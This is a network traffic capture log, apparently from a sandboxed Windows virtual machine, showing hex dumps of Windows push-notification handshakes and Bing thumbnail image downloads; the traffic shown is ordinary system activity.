2024-12-16 10:24:51 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 63 47 5a 51 7a 79 64 4e 78 30 32 34 73 75 73 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 37 37 35 36 63 33 39 63 31 64 32 39 38 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cGZQzydNx024susR.2Context: a77756c39c1d298c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:24:51 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 63 47 5a 51 7a 79 64 4e 78 30 32 34 73 75 73 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 37 37 35 36 63 33 39 63 31 64 32 39 38 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: cGZQzydNx024susR.3Context: a77756c39c1d298c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:24:52 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-16 10:24:52 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 51 64 77 4b 35 6f 6c 6e 35 30 53 59 30 35 71 6a 72 34 51 42 65 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: QdwK5oln50SY05qjr4QBeQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49728	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:24:57 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 35 58 49 56 44 4f 6d 4a 6b 75 43 6b 32 2b 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 36 31 39 65 37 39 64 39 37 38 62 37 31 31 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: n5XIVDOmJkuCk2+G.1Context: 5619e79d978b711d
2024-12-16 10:24:57 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:24:57 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 35 58 49 56 44 4f 6d 4a 6b 75 43 6b 32 2b 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 36 31 39 65 37 39 64 39 37 38 62 37 31 31 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: n5XIVDOmJkuCk2+G.2Context: 5619e79d978b711d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:24:57 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6e 35 58 49 56 44 4f 6d 4a 6b 75 43 6b 32 2b 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 36 31 39 65 37 39 64 39 37 38 62 37 31 31 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: n5XIVDOmJkuCk2+G.3Context: 5619e79d978b711d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:24:58 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-16 10:24:58 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 68 74 69 57 51 50 4d 4e 4e 6b 61 65 50 4a 61 78 63 44 75 70 6a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: htiWQPMNNkaePJaxcDupjg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49761	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:07 UTC	375	OUT	GET /th?id=OADD2.10239360265013_1UVY69FM05I7V26BP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:07 UTC	861	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 193575 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: A7BD2D14ECCD487380480B6D28A09FA3 Ref B: EWR30EDGE1414 Ref C: 2024-12-16T10:25:07Z Date: Mon, 16 Dec 2024 10:25:07 GMT Connection: close
2024-12-16 10:25:07 UTC	3517	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 32 3a 34 31 3a 32 37 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 22:41:278C
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 49 8a 05 71 31 eb 49 8a 79 ed f5 a3 eb f8 55 05 c6 d3 b0 28 a2 95 85 71 3f 9d 14 ec 7a d2 fe 14 c2 e3 68 c7 19 c1 a7 01 fc e8 c5 01 71 31 46 29 d8 ed ef 49 8a 05 71 31 ef 4b 8f 7e d4 b8 e7 a7 6a 31 8e d4 0a e2 63 a5 14 e0 3d 28 c5 00 36 8c 53 85 18 a0 03 1f cb 8a 40 33 4e 3f 8d 18 a0 57 1b 8c 7f f5 e9 40 f6 e9 4e 22 85 1e d4 05 c6 e2 97 14 b8 a3 14 08 6e 28 c5 3f 8a 4c 62 80 b8 98 a3 14 b8 a5 a0 04 a3 14 b8 a5 1f 4a 00 6e 3d a8 a5 34 7b d0 02 51 4e c5 1d 68 15 c4 a3 14 a3 9a 31 da 80 b8 94 63 d2 97 18 ff 00 1a 5c 1a 05 71 bd e9 40 e4 52 e0 9a 5c 62 80 1a 45 2e 38 a5 14 62 80 b8 98 fa d2 53 b1 4b 8f 43 40 ae 37 14 60 7f 93 4e 03 da 8c 50 17 13 1f fe ba 31 4b 8f 6a 31 fe 71 40 84 c7 cb 45 28 1f fd 6a 5c 7b 52 0b 8d 1f 5a 31 8e d4 e0 28 c5 26 02 62 8c 52 e3 Data Ascii: Iq1IyU(q?zhq1F)Iq1K~j1c=(6S@3N?W@N"n(?LbJn=4{QNh1c\q@R\bE.8bSKC@7`NP1Kj1q@E(j\{RZ1(&bR
2024-12-16 10:25:07 UTC	4144	IN	Data Raw: 0c 3a ab 4f 47 d5 76 7f d6 c7 e4 19 ce 51 5f 2b c4 ba 55 35 8b f8 5f 75 fe 7d d1 0e 29 d8 14 f6 1c 71 4d fc 2b d0 3c 8b 8d c5 26 3d a9 f8 e3 8a 29 a1 dc 69 1d a9 76 f3 4b 8f 6f ce 97 6d 01 71 b4 63 34 ed bc 74 a5 c5 17 15 c6 62 8c 53 b6 ff 00 fa e8 c0 f4 a6 17 1b 8a 31 4e a3 14 05 c4 c0 a4 a7 e0 52 52 41 71 00 f5 a4 ef 4f c5 18 a6 2b 8d 02 97 14 b8 e2 97 14 05 c6 b0 c0 e9 47 bd 3b 1d cd 18 e3 14 05 c6 91 40 14 ec 51 40 5c 4c 52 62 9d 83 4b 8a 05 71 a0 52 62 9f 8a 30 68 0b 8d c5 18 a7 62 8c 50 17 1b 8a 5c 52 e2 96 81 5c 6e 28 c5 3b 1e d4 50 17 1a 05 2e 29 70 7a 51 83 40 5c 4c 52 d2 e2 8c 52 15 c4 a2 9d 8a 31 8a 2e 03 70 69 71 4b 81 f8 d2 e2 8b 8a e3 71 4b 8a 76 3f 1a 31 4c 2e 37 14 62 9d 8a 29 21 5c 6e 3b 51 f5 a7 51 4c 04 da 68 02 97 06 9d 8a 5b 00 cc 51 Data Ascii: :OGvQ_+U5_u})qM+<&=)ivKomqc4tbS1NRRAqO+G;@Q@\LRbKqRb0hbP\R\n(;P.)pzQ@\LRR1.piqKqKv?1L.7b)!\n;QQLh[Q
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 73 53 36 37 7c a0 fd e2 30 3b d0 bc fc dc e7 df bd 2b 9a 72 ab 91 79 7e 9d fb 0e 94 30 04 af 07 e9 eb 4f c0 ea 09 e5 b1 d3 a5 2b 29 0c 33 90 07 04 51 70 e5 4d 6c 45 b7 39 ff 00 1a 0a e7 8f c8 53 9b 8e 00 1b 8b 10 69 ea bb bb 11 9e bc 50 24 93 76 22 0b ed f8 83 46 de 87 3d aa 5c 06 62 06 7a 74 c5 1e 5e 58 1c 77 e8 39 e7 fc ff 00 5a 2e 57 27 62 bb 02 39 23 d3 a0 a5 db c7 2b cf d7 ad 48 3b 29 e0 75 eb d6 9c c9 d3 81 f3 63 bf 4f fe b5 17 22 31 bd ec 45 8c 28 c8 cf 14 9b 49 e9 db df ad 4c 17 21 b0 3a 8c f3 ce 28 f2 d4 f4 eb 8e 40 34 73 15 c8 c8 4a 71 cf 4c 0e b4 04 fc 7d d6 a6 65 c7 00 9e a3 8a 5d b9 00 01 d0 82 73 45 c3 91 10 6c 1e a3 af 3c 74 a6 ed c1 fc 3b d5 95 4c 72 4f 7e 9e 94 32 73 8f 7e 7d a8 e6 0f 67 a1 5b 6f b6 3e a2 97 69 e8 47 e3 e9 53 98 ce ee 49 Data Ascii: sS67\|0;+ry~0O+)3QpMlE9SiP$v"F=\bzt^Xw9Z.W'b9#+H;)ucO"1E(IL!:(@4sJqL}e]sEl<t;LrO~2s~}g[o>iGSI
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 68 3d 80 c6 2b c7 a1 9d ce 55 9b ab 25 cb 6d 8f 7f 11 c3 94 23 42 31 a3 0f 7a fb f5 3c 23 c3 56 6a 6e 61 fb 44 02 33 0a 62 40 54 85 94 8e 7e 61 d8 e0 8e 9e 82 bb 6d 0c e9 29 1a cd 2d b1 93 cb 3f 32 29 f9 9b 3d 08 07 86 e9 cf d6 bd 72 4f 85 7a 65 cf 86 e3 8e 10 cb 75 67 1b ee ba 89 72 d7 24 29 21 4a f7 e7 8c 8e 6b ca 6d e7 4b 39 25 86 28 96 36 6d d1 96 07 a0 e8 47 e1 8a d7 eb b0 c5 5f 93 a0 96 02 78 4b 73 6c cd 4d 37 54 b6 c0 82 1d 17 cc 6c 1c 33 45 bb e5 3d 41 ed db f4 ae 8e d6 fb 53 b8 d2 8d a8 b1 86 18 55 9b cb 5f 21 55 a1 62 30 78 c6 71 cf 43 eb 58 be 1e b8 23 4f 08 13 2e cd 92 41 24 f1 d7 f3 cd 75 5a 4d c4 33 4c cf 29 67 f3 09 66 72 3d b1 fd 2b 8a bb 49 ec 7a 18 74 da f8 83 52 b6 bd bd d3 60 82 5b b9 22 54 5e 32 c5 b0 76 e3 8c fd 05 64 c1 a3 6a 6f b9 Data Ascii: h=+U%m#B1z<#VjnaD3b@T~am)-?2)=rOzeugr$)!JkmK9%(6mG_xKslM7Tl3E=ASU_!Ub0xqCX#O.A$uZM3L)gfr=+IztR`["T^2vdjo
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: af d0 1e f5 6c 46 03 0c 01 f4 f5 a5 f2 c6 de 9d 0f 7a 39 c7 ec 0a ab 16 7b 71 9e 41 14 79 59 1d 72 7a 72 3a 55 c1 13 75 fd 31 d2 95 62 ef 8f c2 97 39 5e c0 a7 e5 12 dd 07 5e 69 de 57 cb 80 39 f4 f4 ab 4b 11 3f 9f 5f 5a 73 46 43 7f 3c 51 ed 0a 54 11 44 c4 dd 41 1d 3b 77 a7 43 16 1b 9c 7d 2a e1 88 ed 23 3e dd 6a 3c a8 ed db a7 a5 1c f7 17 b0 51 64 28 83 b7 af 71 d2 9a c8 a8 ac ef c2 aa 92 49 ed 81 9f e9 56 a1 1b b9 c8 38 38 00 f5 ae 53 e2 16 b3 73 04 d2 68 f6 fe 52 23 05 0f 22 b6 59 bb 95 3d 86 38 a9 75 2c 6b 4f 0d ed 2c 91 99 ad 6a 43 5d b9 b7 82 1b 75 8e 3b 7d c0 3b 10 5d f3 ef d9 7d bd 79 a9 6d d5 ac 76 ec 44 62 c4 16 0d 8e 31 db e9 59 30 2a 46 a1 43 86 3d 5b 07 ad 3c 4e e8 db 4b ee 5e c0 9e 95 c3 51 ca 6f 73 dd c3 fb 3a 50 b2 5b 17 2f 1e 37 cf 3d 4f 4c Data Ascii: lFz9{qAyYrzr:Uu1b9^^iW9K?_ZsFC<QTDA;wC}#>j<Qd(qIV88SshR#"Y=8u,kO,jC]u;};]}ymvDb1Y0FC=[<NK^Qos:P[/7=OL
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: c9 8e 7a 73 c1 c5 1c c1 ca 70 8c a0 15 20 0c e3 a6 69 fb 32 d9 c3 0e dd 2a 7d 9d 88 27 a6 3d ff 00 ce 69 59 72 c7 9e fd 2b bb 98 f2 3d 9d 91 0e cf f3 8a 55 52 16 a6 c0 0b 8f 4f 5a 5d b8 e4 8e f4 73 07 21 10 5e d8 e8 33 d3 a5 2a c6 3f c7 3d ea 5d 87 19 f6 a7 2a fe b4 73 07 29 10 51 d7 1d b8 cf 7a 02 81 93 82 7d 6a 60 9d 7e bc 56 66 ad ab 5b 5b df 7d 8f 7f fa 96 1f 68 2a 39 f5 d8 3f af e5 59 d4 aa a1 16 ce 9c 3e 1a 55 aa 2a 6b 4b 9d d7 83 fc 0d 17 88 ad 60 92 d7 55 30 ca 53 74 f1 c9 01 65 ce 7a 21 1c e3 18 e6 b7 2f be 09 78 90 44 f2 e9 9a ae 9b 74 41 f9 6d e4 0f 13 9f f6 77 1c 8c d7 39 f0 bf c6 8b 65 ad 43 70 c8 cd 6d 1a 95 31 86 eb 9e bc f7 af a1 bc 27 af d9 df da 89 a0 b8 59 23 c0 c8 fe 25 f6 35 f2 d8 bc d3 1f 42 77 52 d3 d1 1f a0 61 f2 0c a6 b5 24 b9 35 Data Ascii: zsp i2}'=iYr+=UROZ]s!^3?=]s)Qz}j`~Vf[[}h9?Y>U*kK`U0Stez!/xDtAmw9eCpm1'Y#%5BwRa$5
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 3d ea 94 8a 19 83 60 fd 73 49 35 c4 52 36 02 e1 54 f3 8a 48 49 3f 28 c1 04 f2 71 cd 0e 36 08 cc d0 d2 62 55 c3 11 ce 78 26 ba bd 1e e1 d1 77 c4 48 93 20 30 6f ba 57 fa 62 b0 34 b4 03 03 3f 37 a1 1d 6b 52 17 da cf b5 48 cf 53 ed e9 5c 95 35 3a e1 24 a4 75 16 7f 68 4d 93 65 a4 56 38 0a ad 83 ed d3 d7 f9 57 4f a1 c4 1d a3 ba 8d d3 71 5d ac a0 e0 9f c7 d8 8a e5 7c 3b 30 92 d9 16 46 2a db b9 c1 e4 2f d3 bf 5a d7 d3 e6 7b 7b 8d 8b 92 79 3b 41 c6 7f ce 05 79 d5 62 de 87 ad 46 49 34 cf 54 f0 e5 ec 57 ba a5 94 53 17 6b 86 88 c1 31 38 db 22 af dd 7e 78 dd 81 82 3d b3 5b 1a b5 ed bd b6 a4 b6 bb 77 4d 18 0c ad f7 72 33 d0 fe 47 15 c2 e9 57 36 f7 7a 7f 9c 08 f3 17 90 4f 66 ce 73 5d 15 ed dc 57 da 33 5d c6 e3 ed 9a 72 ee 9d 81 f9 4a 33 61 b2 4f a1 c1 fc 71 5e 44 e9 da Data Ascii: =`sI5R6THI?(q6bUx&wH 0oWb4?7kRHS\5:$uhMeV8WOq]\|;0F*/Z{{y;AybFI4TWSk18"~x=[wMr3GW6zOfs]W3]rJ3aOq^D
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: 5b a5 5f 25 d5 54 7d e2 85 73 f4 ae 16 76 a3 62 19 7c c9 1b 20 16 1f 36 e8 f8 51 f4 ac ff 00 16 f8 6f 4a d6 34 b9 ad 6f ad 14 f9 ca 24 59 a2 55 12 a1 cf de 57 03 21 b3 c1 cf ad 3b ce 2a bc 26 57 69 fe 2c 75 18 e7 d7 15 05 e6 b4 62 65 8d 20 91 98 ae d6 66 90 9d c3 f1 ed d3 f2 a9 87 3c 64 a5 07 66 82 a7 b3 94 1c 66 ae 99 c6 5e 7c 2b 12 2b 3e 95 af 85 27 98 e0 bd 83 71 fa 17 4f 71 d4 8a cb ba f8 67 e2 e8 23 32 2d ad 94 ea ab 92 61 ba 19 3e a0 02 06 4f f3 ae ea ea e3 c4 0a ab 77 e1 f8 2d 65 60 ff 00 e9 70 4d 13 9f 31 00 e0 29 18 da 73 d4 f2 70 38 ad dd 03 5d b6 d4 ae 85 ac 11 14 ba ce 66 b4 b9 5d 93 46 bd 0b 01 d1 d4 64 72 3d 79 02 bd 25 9a 63 20 af 74 d7 9a ff 00 86 3c 99 64 b9 7d 47 a4 5c 5f 93 ff 00 3b 9e 01 24 13 c2 01 9e d2 e6 1d c3 83 2c 0c bf 8e 48 c5 Data Ascii: [_%T}svb\| 6QoJ4o$YUW!;*&Wi,ube f<dff^\|++>'qOqg#2-a>Ow-e`pM1)sp8]f]Fdr=y%c t<d}G\_;$,H
2024-12-16 10:25:08 UTC	8192	IN	Data Raw: 02 93 a7 88 2d 4a 15 1e 5f 0c 58 70 33 ed dc 73 5e 9f e0 6b 68 2c 6f 51 94 ff 00 a4 33 6c c8 1c 14 3c 7c be 87 9a f1 f1 75 37 47 bd 97 d0 57 4f cc da d0 d5 6c b4 e3 24 91 45 11 b3 80 f9 aa 17 19 c7 3c 8e fc 7f 5a e2 6d 56 5b 58 d2 42 d1 c9 f6 82 67 62 8e 1b 86 39 53 91 df 07 91 5d be 85 31 d4 6f b5 09 0b fe f1 a7 da 14 81 f3 aa 8d bc fd 70 73 5c cd 8d b4 82 46 2f 01 89 65 95 fc b4 2b d5 41 e4 fa 63 d2 b8 a9 bb 5e e7 a5 59 5d 46 de 63 f4 a9 a3 62 d2 c4 df ea 64 49 3c b1 18 38 20 f5 24 f2 01 c9 1c 75 ef 5a 9f 13 95 92 ce 2b d8 c6 15 5f cb 04 1f 99 b7 0e 08 1f 86 2a 3d 27 4f 82 3b 89 25 74 68 d0 a9 0c f1 f6 1d 89 fc 48 a3 e2 16 a6 b0 5f 5a d9 d8 e0 f9 56 ca ed 29 6d de 58 27 e5 e0 f1 9e 0d 25 ad 45 61 bd 28 cb 98 cd d3 e7 7d 3e ce 35 8c b1 ba 94 1c f1 ca 13 Data Ascii: -J_Xp3s^kh,oQ3l<\|u7GWOl$E<ZmV[XBgb9S]1ops\F/e+Ac^Y]FcbdI<8 $uZ+_*='O;%thH_ZV)mX'%Ea(}>5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49762	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:07 UTC	346	OUT	GET /th?id=OADD2.10239381718310_196JULM87GXSDC05M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:07 UTC	861	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 514534 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: A020B937265D4266B016DEC20A1E3BA8 Ref B: EWR30EDGE0111 Ref C: 2024-12-16T10:25:07Z Date: Mon, 16 Dec 2024 10:25:07 GMT Connection: close
2024-12-16 10:25:07 UTC	431	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 32 35 3a 34 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:25:438C
2024-12-16 10:25:07 UTC	8192	IN	Data Raw: c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 